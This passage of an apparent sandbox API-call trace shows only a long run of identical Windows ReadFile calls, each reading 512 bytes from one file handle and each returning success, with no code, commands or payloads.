lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.013] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.014] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.015] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.016] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.017] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.018] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.019] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.020] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: 